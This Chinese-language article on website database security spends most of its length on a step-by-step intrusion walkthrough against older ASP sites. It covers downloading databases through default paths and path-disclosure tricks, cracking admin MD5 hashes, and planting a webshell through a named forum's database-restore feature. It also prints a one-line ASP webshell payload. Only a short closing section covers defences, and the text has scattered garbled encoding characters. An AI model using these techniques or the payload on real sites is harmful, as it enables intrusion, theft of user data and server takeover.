數(shù)據(jù)庫對于一個(gè)網(wǎng)站來說意味著什么?可能有很多站長會說只是一個(gè)記錄數(shù)據(jù)的工具。這種說法固然沒錯(cuò)���,但是卻遺漏了重要的一點(diǎn)���,數(shù)據(jù)庫也是一個(gè)網(wǎng)站安全的中心,一旦數(shù)據(jù)庫被黑客得到��,那么輕則得到網(wǎng)站數(shù)據(jù)和用戶隱私信息��,重則滲透網(wǎng)站�����,影響整個(gè)服務(wù)器的安全��。正因?yàn)楹芏嗾鹃L對數(shù)據(jù)庫的安全意識不夠�����,才導(dǎo)致很多安全問題的發(fā)生。本文將讓大家了解數(shù)據(jù)庫對一個(gè)網(wǎng)站的重要性���,并為數(shù)據(jù)庫建造一面“銅墻鐵壁”�����。 一���、數(shù)據(jù)庫的獲取
數(shù)據(jù)庫對網(wǎng)站重要性不言而喻,那么黑客是通過什么手段得到網(wǎng)站數(shù)據(jù)庫的呢�����?
1.默認(rèn)的數(shù)據(jù)庫路徑
很多站長建站或論壇使用的都是現(xiàn)成的整站程序���,這就造成了一個(gè)很大的安全隱患�����,即默認(rèn)的數(shù)據(jù)庫的路徑�����。雖然在這些程序的說明文檔中都提示修改數(shù)據(jù)庫的默認(rèn)路徑���,但是仍有些安全意識不高的站長不屑于修改或者不會修改。這樣當(dāng)黑客在該網(wǎng)站的地址后輸入默認(rèn)數(shù)據(jù)庫的路徑��,就可以輕易下載到數(shù)據(jù)庫�����。
2.暴庫顯示路徑
什么叫“暴庫”�����,簡單得說就是構(gòu)造特殊地址使網(wǎng)站程序運(yùn)行出錯(cuò)�����,從出錯(cuò)的信息中得到數(shù)據(jù)庫的路徑�����。暴庫并不是一門十分高深的技術(shù)��,但是卻可以很快得找到數(shù)據(jù)庫路徑,而且成功率很高�����。要想進(jìn)行暴庫���,首先需要對IE進(jìn)行設(shè)置���,運(yùn)行IE,點(diǎn)擊“工具”菜單→“Internet選項(xiàng)”,切換到“高級”標(biāo)簽���,將“顯示友好HTTP錯(cuò)誤信息”前面的勾去掉�����,然后保存��,這樣做是讓瀏覽器返回真實(shí)的錯(cuò)誤信息�����,而不是類似505錯(cuò)誤�����,405錯(cuò)誤等經(jīng)過處理后的錯(cuò)誤信息�����。找到一個(gè)存在暴庫漏洞的程序�����,例如較早版本的“動(dòng)力文章系統(tǒng)”�����。打開““動(dòng)力文章系統(tǒng)”的任意頁面�����,在IE地址欄中將該頁面地址出現(xiàn)的最后一個(gè)“/”替換為“%5c”���,然后回車,如果暴庫漏洞存在�����,那么數(shù)據(jù)庫路徑將會馬上顯示出來��。
3.防下載設(shè)置不夠嚴(yán)密
排除程序的原因,數(shù)據(jù)庫被下載很大一部分的原因是人為因素�����。有些站長已經(jīng)認(rèn)識到數(shù)據(jù)庫的重要性���,雖然沒有修改默認(rèn)的路徑�����,但是將數(shù)據(jù)庫默認(rèn)的后綴名“mdb”改為了“asp”�����,這樣即使別人知道了數(shù)據(jù)庫的路徑�����,也無法在瀏覽器中進(jìn)行下載��,而是直接在頁面中顯示數(shù)據(jù)庫的內(nèi)容���,當(dāng)然都是一些亂碼。不過我們雖然無法在瀏覽器中下載��,卻可以借用專用的下載軟件來實(shí)現(xiàn)數(shù)據(jù)庫的下載,或者將頁面中出現(xiàn)的所有內(nèi)容復(fù)制到一個(gè)文本文檔中���,然后將這個(gè)文檔的后綴名改為“mdb”��。
還有一種情況就是站長在數(shù)據(jù)庫的文件名中加入了“#”符號���,例如原來的數(shù)據(jù)庫名為123.mdb,加入“#”號后變成“#123.mdb”���,這樣當(dāng)我們在地址欄中直接輸入“http://www.***.com/#123.mdb”�����,是無法下載數(shù)據(jù)庫的,而是顯示“無法找到網(wǎng)頁”���。這是因?yàn)闉g覽器的編碼格式會默認(rèn)將“#”號變?yōu)?ldquo;%23”�����,這樣就成了另外一個(gè)網(wǎng)址��,當(dāng)然不可能下載到數(shù)據(jù)庫���。那么我們反過來將“%23”替換為“#”���,填入到網(wǎng)址中,數(shù)據(jù)庫不就可以正確下載了嗎?
二���、破解數(shù)據(jù)庫中的管理員賬戶信息
得到數(shù)據(jù)庫后可以做什么��?可以歸結(jié)為以下幾點(diǎn):1.破解得到網(wǎng)站管理員的賬戶名與密碼��;2.得到網(wǎng)站注冊用戶的信息�����;3.查看一些普通用戶無法查看到的資料��。其中最有價(jià)值的就是保存在數(shù)據(jù)庫中的管理員賬戶信息���。能成功得到管理員的賬戶密碼,我們就成功了一半�����。
得到網(wǎng)站的數(shù)據(jù)庫后(這里指的是Access數(shù)據(jù)庫)���,將數(shù)據(jù)庫的后綴名改為mdb���,這樣我們就可以使用“Microsoft Office Access”來打開數(shù)據(jù)庫�����,通常在“admin”表中的就是管理員的賬戶信息��。對于安全性不高的網(wǎng)站程序��,管理員的賬戶名和密碼會以明文的形式顯示���,這樣我們就省去了破解這一步。而絕大部分的網(wǎng)站程序都對管理員的密碼進(jìn)行了md5加密���。md5是一種不可逆的加密算法,加密過的數(shù)據(jù)不可能再還原�����,因此我們必須通過暴力破解���,來獲取密碼原文���。
1.網(wǎng)站破解
破解md5的最快方法是通過專門的破解網(wǎng)站�����。登陸“http://www.xmd5.org/go_cn.htm”��,點(diǎn)擊頁面中的“解密”鏈接進(jìn)行破解��,將加密后的密文填入到文本框中�����,然后點(diǎn)擊“給我轉(zhuǎn)”���,即可破解得到密碼,但是這類網(wǎng)站有其局限性���,只能破解簡單的密碼��,而遇到強(qiáng)悍的密碼就無能為力了��。
2.軟件破解
除了通過網(wǎng)站破解��,我們還可以使用專門的md5密碼破解工具���。下載“md5crack”�����,無需安裝可直接運(yùn)行��。運(yùn)行后可以看到兩個(gè)設(shè)置選項(xiàng)��,分別是“密文設(shè)置”���、“字符設(shè)置”,在“字符設(shè)置”中可以對破解形式進(jìn)行選擇���。我們將需要破解的密文輸入到“密文設(shè)置”中的“破解單個(gè)密文”文本框中��,軟件也可以同時(shí)破解多個(gè)密文�����,選中“破解多個(gè)密文”,點(diǎn)“設(shè)置”即可��。
軟件對md5密文采用兩種破解方式��,“暴力破解”和“字典破解”,前者采用猜解來得到密碼�����,后者是通過字典中已存在密碼與需要破解的密文進(jìn)行對比得出密碼���。對于比較常見的密碼�����,使用“字典破解”的成功率是很高的�����。這里我們選擇“暴力破解”來演示�����。在“字符設(shè)置”中選中“使用字符集”��,然后勾選“數(shù)字”��,這樣就可以破解密碼為數(shù)字的密文�����,當(dāng)然我們也可以同時(shí)選中其他選項(xiàng)���,不過破解時(shí)間會相應(yīng)變長���。設(shè)置完成后點(diǎn)擊“開始”,即可開始破解工作���。軟件的破解速度很快��,對于不太復(fù)雜的密碼可以很快破解��。
三�����、利用網(wǎng)站數(shù)據(jù)庫備份功能���,得到webshell
由于各種網(wǎng)站程序的編寫越來越人性化,都在其后臺管理增加了數(shù)據(jù)庫的備份恢復(fù)功能�����,而這個(gè)功能卻被黑客敞開了大門,通過數(shù)據(jù)庫備份功能���,我們可以輕易得得到網(wǎng)站的webshell,從而進(jìn)一步滲透��。
我們以著名的動(dòng)網(wǎng)論壇7.0sp3版本為例��,假設(shè)我們已經(jīng)下載到了數(shù)據(jù)庫��,并利用數(shù)據(jù)庫里的數(shù)據(jù)�����,破解得到了管理員的賬戶名和密碼���。我們以管理員的身份登陸�����,在論壇發(fā)表一篇帖子�����,然后將我們的asp木馬以附件的形式上傳到服務(wù)器���,這里需要將asp木馬的后綴名改為jpg���,才能正常上傳。上傳成功后得到類似“UploadFile/2006-3/123.jpg”的地址��。登陸論壇的后臺管理頁面�����,點(diǎn)擊頁面中的“恢復(fù)數(shù)據(jù)庫”選項(xiàng)��,接著會出現(xiàn)“恢復(fù)數(shù)據(jù)庫”頁面�����,在其中的“備份數(shù)據(jù)庫路徑(相對)”中填入我們上傳附件成功后的地址�����,然后在“目標(biāo)數(shù)據(jù)庫路徑(相對)”中填入muma.asp���,點(diǎn)擊“恢復(fù)數(shù)據(jù)”即可��。這樣就會在論壇的根目錄中生成我們的muma.asp��,直接輸入地址就可以得到webshell了��。
四��、數(shù)據(jù)庫的惡夢�����,C/S型asp木馬
所謂的C/S型asp木馬���,就是客戶端和服務(wù)端分開的asp木馬。這種asp木馬運(yùn)作方式是:先將服務(wù)端代碼插入到網(wǎng)站的數(shù)據(jù)庫中�����,然后通過客戶端程序進(jìn)行連接�����,連接上后就可以像普通asp木馬那樣進(jìn)行操作��。不過C/S木馬的運(yùn)行條件是目標(biāo)數(shù)據(jù)庫的后綴名必須已改為asp或asa��,對于后綴名為mdb的數(shù)據(jù)庫則不起任何作用��。下面我們通過C/S木馬來獲取一個(gè)webshell。
首先需要得到目標(biāo)網(wǎng)站的數(shù)據(jù)庫路徑��,并且確認(rèn)數(shù)據(jù)庫的后綴名為asp或asa�����。然后來到網(wǎng)站任何可以將數(shù)據(jù)寫入數(shù)據(jù)庫的地方��,將我們的asp木馬服務(wù)端“<%execute(request("cmd"))%>”(其中cmd是連接密碼���,可以修改為自己的密碼)提交到網(wǎng)站上���,這樣數(shù)據(jù)庫中就有了我們的木馬服務(wù)端。然后我們運(yùn)行目前較為成熟的C/S木馬“lanker微型asp后門”���,在“木馬地址”中寫入網(wǎng)站數(shù)據(jù)庫的路徑��,然后在“基本功能列表”中選擇“環(huán)境變量”���,點(diǎn)“提交”就可以成功連接到服務(wù)端了。連接后可以在“基本功能列表中”選擇相應(yīng)的功能進(jìn)行操作�����,和一般的webshell無異。
五���、打造數(shù)據(jù)庫的“銅墻鐵壁”
數(shù)據(jù)庫的防下載其實(shí)并不難���,如果自己對網(wǎng)站所在的服務(wù)器有管理權(quán),那么防下載只需在網(wǎng)站程序上做一下簡單的設(shè)置���。如果網(wǎng)站是建立在虛擬主機(jī)上的,也只需編寫一個(gè)數(shù)據(jù)庫防下載的asp文件即可解決問題���。
1.更改數(shù)據(jù)庫路徑
如果自己對網(wǎng)站所在的服務(wù)器有管理權(quán)�����,那么我們可以將網(wǎng)站程序和數(shù)據(jù)庫放在不同的目錄中���,例如將網(wǎng)站程序放在c:/web文件夾中,將數(shù)據(jù)庫放在d:/data文件夾中���,然后在網(wǎng)站程序中將數(shù)據(jù)庫的指向改為“d:/data/數(shù)據(jù)庫文件”即可���。因?yàn)閿?shù)據(jù)庫不在網(wǎng)站目錄下��,因此不存在被下載的問題���。
2.編寫防下載asp文件
如果網(wǎng)站是建立在虛擬主機(jī)上的,可以在數(shù)據(jù)庫中添加防下載表�����。首先將網(wǎng)站數(shù)據(jù)庫改為asp后綴�����,然后用記事本打開“數(shù)據(jù)庫防下載.asp”(本文相關(guān)軟件包中有提供)���,將第二行中的數(shù)據(jù)庫地址改為自己網(wǎng)站的數(shù)據(jù)庫地址���,然后將這個(gè)asp文件上傳到網(wǎng)站上,用瀏覽器執(zhí)行一次即可�����。文件執(zhí)行完畢后會在數(shù)據(jù)庫中添加防下載表��,這樣當(dāng)輸入數(shù)據(jù)庫地址時(shí)會出現(xiàn)“無法顯示該頁”的錯(cuò)誤信息。
3.入侵后的補(bǔ)救措施
黑客利用下載數(shù)據(jù)庫入侵后���,通常會留下一些asp木馬�����,作為后門控制網(wǎng)站���。因此如果發(fā)現(xiàn)網(wǎng)站被入侵,檢測asp木馬是否存在也是一件十分重要的事���。對于asp木馬的檢測���,可以使用“思易asp木馬追捕”��,它可以像殺毒軟件一樣通過特征碼來查找存在于網(wǎng)站中的asp木馬���。因此有“越軌操作”的asp文件都會被其列入黑名單�����。同時(shí)對于每個(gè)asp文件所擁有的權(quán)限都將以列表的形式顯示���,具有危險(xiǎn)性的asp文件一目了然���。
